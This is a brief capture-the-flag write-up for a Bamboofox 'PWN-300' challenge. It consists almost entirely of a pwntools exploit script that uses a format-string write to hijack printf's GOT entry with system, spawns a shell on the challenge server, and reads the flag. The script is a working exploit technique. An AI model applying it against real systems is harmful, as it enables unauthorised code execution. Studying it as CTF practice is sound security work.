# Bamboofox/Hitcon community/PWN-300 [300] ###### tags: `CTF`,`PWN`,`Bamboofox`,`writeup` 題目檔案連結：http://gofile.me/6lhQ2/ZL2EZu35z Format String + GOT hijack ``` # -*- coding: UTF-8 -*- import time from pwn import * local = False debug = True gdb1 = False elf1 = ELF("./binary_300") if debug == True: context.log_level = "debug" if local == True: r = process("./binary_300") if gdb1 == True: gdb.attach(r) else: r = remote('bamboofox.cs.nctu.edu.tw', 22003) printf_got = elf1.got['printf'] #0x804a00c system_plt = elf1.plt['system'] #0x8048410 payload = b"%"+str(int(0x804)-8).encode('utf-8')+b"c%7$hn%"+str(int(0x8410-0x804)).encode('utf-8')+b"c%8$hn" r.sendline(p32(printf_got+2)+p32(printf_got)+payload) r.sendline("/bin/sh") time.sleep(2) r.sendline("cat /home/ctf/flag") r.interactive() ```